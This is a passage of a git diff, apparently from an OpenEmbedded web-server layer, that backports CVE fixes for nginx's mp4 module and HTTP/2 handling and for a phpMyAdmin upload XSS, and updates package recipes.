<libexslt/exslt.h>" +- ngx_feature_path="/usr/include/libxml2" ++ ngx_feature_path="=/usr/include/libxml2" + ngx_feature_libs="-lexslt" + ngx_feature_test="exsltRegisterAll();" + . auto/feature +-- +2.35.5 + diff --git a/meta-webserver/recipes-httpd/nginx/files/CVE-2022-41741-CVE-2022-41742.patch b/meta-webserver/recipes-httpd/nginx/files/CVE-2022-41741-CVE-2022-41742.patch new file mode 100644 index 0000000000..d151256b37 --- /dev/null +++ b/meta-webserver/recipes-httpd/nginx/files/CVE-2022-41741-CVE-2022-41742.patch @@ -0,0 +1,319 @@ +From 91a3b5302d6a2467df70d3b43450991a53f9946b Mon Sep 17 00:00:00 2001 +From: Hitendra Prajapati <hprajapati@mvista.com> +Date: Wed, 16 Nov 2022 11:24:25 +0530 +Subject: [PATCH] CVE-2022-41741, CVE-2022-41742 + +Upstream-Status: Backport [https://github.com/nginx/nginx/commit/6b022a5556af22b6e18532e547a6ae46b0d8c6ea] +CVE: CVE-2022-41741, CVE-2022-41742 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> + +Mp4: disabled duplicate atoms. + +Most atoms should not appear more than once in a container. Previously, +this was not enforced by the module, which could result in worker process +crash, memory corruption and disclosure. +--- + src/http/modules/ngx_http_mp4_module.c | 147 +++++++++++++++++++++++++ + 1 file changed, 147 insertions(+) + +diff --git a/src/http/modules/ngx_http_mp4_module.c b/src/http/modules/ngx_http_mp4_module.c +index 0e93fbd..4f4d89d 100644 +--- a/src/http/modules/ngx_http_mp4_module.c ++++ b/src/http/modules/ngx_http_mp4_module.c +@@ -1070,6 +1070,12 @@ ngx_http_mp4_read_ftyp_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + return NGX_ERROR; + } + ++ if (mp4->ftyp_atom.buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 ftyp atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom_size = sizeof(ngx_mp4_atom_header_t) + (size_t) atom_data_size; + + ftyp_atom = ngx_palloc(mp4->request->pool, atom_size); +@@ -1128,6 +1134,12 @@ ngx_http_mp4_read_moov_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + return NGX_DECLINED; + } + ++ if (mp4->moov_atom.buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 moov atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + conf = ngx_http_get_module_loc_conf(mp4->request, ngx_http_mp4_module); + + if (atom_data_size > mp4->buffer_size) { +@@ -1195,6 +1207,12 @@ ngx_http_mp4_read_mdat_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + ngx_log_debug0(NGX_LOG_DEBUG_HTTP, mp4->file.log, 0, "mp4 mdat atom"); + ++ if (mp4->mdat_atom.buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 mdat atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + data = &mp4->mdat_data_buf; + data->file = &mp4->file; + data->in_file = 1; +@@ -1321,6 +1339,12 @@ ngx_http_mp4_read_mvhd_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + ngx_log_debug0(NGX_LOG_DEBUG_HTTP, mp4->file.log, 0, "mp4 mvhd atom"); + ++ if (mp4->mvhd_atom.buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 mvhd atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom_header = ngx_mp4_atom_header(mp4); + mvhd_atom = (ngx_mp4_mvhd_atom_t *) atom_header; + mvhd64_atom = (ngx_mp4_mvhd64_atom_t *) atom_header; +@@ -1586,6 +1610,13 @@ ngx_http_mp4_read_tkhd_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + atom_size = sizeof(ngx_mp4_atom_header_t) + (size_t) atom_data_size; + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_TKHD_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 tkhd atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->tkhd_size = atom_size; + + ngx_mp4_set_32value(tkhd_atom->size, atom_size); +@@ -1624,6 +1655,12 @@ ngx_http_mp4_read_mdia_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_MDIA_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 mdia atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->mdia_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -1747,6 +1784,13 @@ ngx_http_mp4_read_mdhd_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + atom_size = sizeof(ngx_mp4_atom_header_t) + (size_t) atom_data_size; + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_MDHD_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 mdhd atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->mdhd_size = atom_size; + trak->timescale = timescale; + +@@ -1789,6 +1833,12 @@ ngx_http_mp4_read_hdlr_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_HDLR_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 hdlr atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->hdlr_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -1817,6 +1867,12 @@ ngx_http_mp4_read_minf_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_MINF_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 minf atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->minf_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -1860,6 +1916,15 @@ ngx_http_mp4_read_vmhd_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_VMHD_ATOM].buf ++ || trak->out[NGX_HTTP_MP4_SMHD_ATOM].buf) ++ { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 vmhd/smhd atom in \"%s\"", ++ mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->vmhd_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -1891,6 +1956,15 @@ ngx_http_mp4_read_smhd_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_VMHD_ATOM].buf ++ || trak->out[NGX_HTTP_MP4_SMHD_ATOM].buf) ++ { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 vmhd/smhd atom in \"%s\"", ++ mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->smhd_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -1922,6 +1996,12 @@ ngx_http_mp4_read_dinf_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_DINF_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 dinf atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->dinf_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -1950,6 +2030,12 @@ ngx_http_mp4_read_stbl_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_STBL_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stbl atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->stbl_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -2018,6 +2104,12 @@ ngx_http_mp4_read_stsd_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_STSD_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stsd atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->stsd_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -2086,6 +2178,13 @@ ngx_http_mp4_read_stts_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + atom_end = atom_table + entries * sizeof(ngx_mp4_stts_entry_t); + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_STTS_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stts atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->time_to_sample_entries = entries; + + atom = &trak->stts_atom_buf; +@@ -2291,6 +2390,13 @@ ngx_http_mp4_read_stss_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + "sync sample entries:%uD", entries); + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_STSS_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stss atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->sync_samples_entries = entries; + + atom_table = atom_header + sizeof(ngx_http_mp4_stss_atom_t); +@@ -2489,6 +2595,13 @@ ngx_http_mp4_read_ctts_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + "composition offset entries:%uD", entries); + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_CTTS_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 ctts atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->composition_offset_entries = entries; + + atom_table = atom_header + sizeof(ngx_mp4_ctts_atom_t); +@@ -2692,6 +2805,13 @@ ngx_http_mp4_read_stsc_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + atom_end = atom_table + entries * sizeof(ngx_mp4_stsc_entry_t); + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_STSC_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stsc atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->sample_to_chunk_entries = entries; + + atom = &trak->stsc_atom_buf; +@@ -3024,6 +3144,13 @@ ngx_http_mp4_read_stsz_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + "sample uniform size:%uD, entries:%uD", size, entries); + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_STSZ_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stsz atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->sample_sizes_entries = entries; + + atom_table = atom_header + sizeof(ngx_mp4_stsz_atom_t); +@@ -3207,6 +3334,16 @@ ngx_http_mp4_read_stco_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + atom_end = atom_table + entries * sizeof(uint32_t); + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_STCO_ATOM].buf ++ || trak->out[NGX_HTTP_MP4_CO64_ATOM].buf) ++ { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stco/co64 atom in \"%s\"", ++ mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->chunks = entries; + + atom = &trak->stco_atom_buf; +@@ -3413,6 +3550,16 @@ ngx_http_mp4_read_co64_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + atom_end = atom_table + entries * sizeof(uint64_t); + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_STCO_ATOM].buf ++ || trak->out[NGX_HTTP_MP4_CO64_ATOM].buf) ++ { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stco/co64 atom in \"%s\"", ++ mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->chunks = entries; + + atom = &trak->co64_atom_buf; +-- +2.25.1 + diff --git a/meta-webserver/recipes-httpd/nginx/nginx.inc b/meta-webserver/recipes-httpd/nginx/nginx.inc index dfced33300..9f93c7051d 100644 --- a/meta-webserver/recipes-httpd/nginx/nginx.inc +++ b/meta-webserver/recipes-httpd/nginx/nginx.inc @@ -22,6 +22,7 @@ SRC_URI = " \ file://nginx-volatile.conf \ file://nginx.service \ file://nginx-fix-pidfile.patch \ + file://0001-configure-libxslt-conf.patch \ " inherit siteinfo update-rc.d useradd systemd @@ -43,6 +44,9 @@ PACKAGECONFIG[gunzip] = "--with-http_gunzip_module,," PACKAGECONFIG[http2] = "--with-http_v2_module,," PACKAGECONFIG[ssl] = "--with-http_ssl_module,,openssl" PACKAGECONFIG[http-auth-request] = "--with-http_auth_request_module,," +PACKAGECONFIG[stream] = "--with-stream,," + +PACKAGECONFIG[xslt] = "--with-http_xslt_module,,libxslt" do_configure () { if [ "${SITEINFO_BITS}" = "64" ]; then diff --git a/meta-webserver/recipes-httpd/nginx/nginx_1.20.1.bb b/meta-webserver/recipes-httpd/nginx/nginx_1.20.1.bb index d686c627f2..8bed04d6d8 100644 --- a/meta-webserver/recipes-httpd/nginx/nginx_1.20.1.bb +++ b/meta-webserver/recipes-httpd/nginx/nginx_1.20.1.bb @@ -1,6 +1,9 @@ require nginx.inc -SRC_URI += "file://CVE-2021-3618.patch" +SRC_URI += "file://CVE-2021-3618.patch \ + file://CVE-2022-41741-CVE-2022-41742.patch \ + file://0001-HTTP-2-per-iteration-stream-handling-limit.patch \ + " LIC_FILES_CHKSUM = "file://LICENSE;md5=206629dc7c7b3e87acb31162363ae505" diff --git a/meta-webserver/recipes-httpd/nginx/nginx_1.21.1.bb b/meta-webserver/recipes-httpd/nginx/nginx_1.21.1.bb index b69fd7dab0..73b5c93c90 100644 --- a/meta-webserver/recipes-httpd/nginx/nginx_1.21.1.bb +++ b/meta-webserver/recipes-httpd/nginx/nginx_1.21.1.bb @@ -1,5 +1,7 @@ require nginx.inc +SRC_URI += "file://0001-HTTP-2-per-iteration-stream-handling-limit.patch" + # 1.20.x branch is the current stable branch, the recommended default # 1.21.x is the current mainline branches containing all new features DEFAULT_PREFERENCE = "-1" diff --git a/meta-webserver/recipes-httpd/nginx/nginx_1.24.0.bb b/meta-webserver/recipes-httpd/nginx/nginx_1.24.0.bb new file mode 100644 index 0000000000..2e865e400e --- /dev/null +++ b/meta-webserver/recipes-httpd/nginx/nginx_1.24.0.bb @@ -0,0 +1,6 @@ +require nginx.inc + +LIC_FILES_CHKSUM = "file://LICENSE;md5=175abb631c799f54573dc481454c8632" + +SRC_URI[sha256sum] = "77a2541637b92a621e3ee76776c8b7b40cf6d707e69ba53a940283e30ff2f55d" + diff --git a/meta-webserver/recipes-php/phpmyadmin/phpmyadmin/CVE-2023-25727.patch b/meta-webserver/recipes-php/phpmyadmin/phpmyadmin/CVE-2023-25727.patch new file mode 100644 index 0000000000..707334a517 --- /dev/null +++ b/meta-webserver/recipes-php/phpmyadmin/phpmyadmin/CVE-2023-25727.patch @@ -0,0 +1,37 @@ +From 0842f11158699a979437125756b26eeabedab9ab Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Maur=C3=ADcio=20Meneghini=20Fauth?= <mauricio@fauth.dev> +Date: Fri, 5 Aug 2022 20:18:16 -0300 +Subject: [PATCH] Fix not escaped title when using drag and drop upload +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Signed-off-by: Maurício Meneghini Fauth <mauricio@fauth.dev> + +Upstream-Status: Backport +CVE: CVE-2023-25727 + +Reference to upstream patch: +https://github.com/phpmyadmin/phpmyadmin/commit/efa2406695551667f726497750d3db91fb6f662e + +Signed-off-by: Dragos-Marian Panait <dragos.panait@windriver.com> +--- + js/src/drag_drop_import.js | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/js/src/drag_drop_import.js b/js/src/drag_drop_import.js +index 55250c2..9b8710e 100644 +--- a/js/src/drag_drop_import.js ++++ b/js/src/drag_drop_import.js +@@ -130,7 +130,7 @@ var DragDropImport = { + var filename = $this.parent('span').attr('data-filename'); + $('body').append('<div class="pma_drop_result"><h2>' + + Messages.dropImportImportResultHeader + ' - ' + +- filename + '<span class="close">x</span></h2>' + value.message + '</div>'); ++ Functions.escapeHtml(filename) + '<span class="close">x</span></h2>' + value.message + '</div>'); + $('.pma_drop_result').draggable(); // to make this dialog draggable + } + }); +-- +2.39.1 + diff --git a/meta-webserver/recipes-php/phpmyadmin/phpmyadmin_5.1.3.bb b/meta-webserver/recipes-php/phpmyadmin/phpmyadmin_5.1.3.bb index 7ccc05ec3e..3f19194391 100644 --- a/meta-webserver/recipes-php/phpmyadmin/phpmyadmin_5.1.3.bb +++ b/meta-webserver/recipes-php/phpmyadmin/phpmyadmin_5.1.3.bb @@ -9,6 +9,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ SRC_URI = "https://files.phpmyadmin.net/phpMyAdmin/${PV}/phpMyAdmin-${PV}-all-languages.tar.xz \ file://apache.conf \ + file://CVE-2023-25727.patch \ " SRC_URI[sha256sum] = "c562feddc0f8ff5e69629113f273a0d024a65fb928c48e89ce614744d478296f" diff --git a/meta-xfce/recipes-xfce/xfce4-settings/xfce4-settings_4.16.2.bb b/meta-xfce/recipes-xfce/xfce4-settings/xfce4-settings_4.16.5.bb index aa4265f7b0..4a4e9f1883 100644 --- a/meta-xfce/recipes-xfce/xfce4-settings/xfce4-settings_4.16.2.bb +++ b/meta-xfce/recipes-xfce/xfce4-settings/xfce4-settings_4.16.5.bb @@ -9,7 +9,7 @@ inherit xfce features_check mime-xdg REQUIRED_DISTRO_FEATURES = "x11" SRC_URI += "file://0001-xsettings.xml-Set-default-themes.patch" -SRC_URI[sha256sum] = "4dd7cb420860535e687f673c0b5c0274e0d2fb67181281d4b85be9197da03d7e" +SRC_URI[sha256sum] = "7a4f74802486d7e77a1c9fa4fda19b13fc8a8dec3e5074f367e34fa82b40d28e" EXTRA_OECONF += "--enable-maintainer-mode --disable-debug" |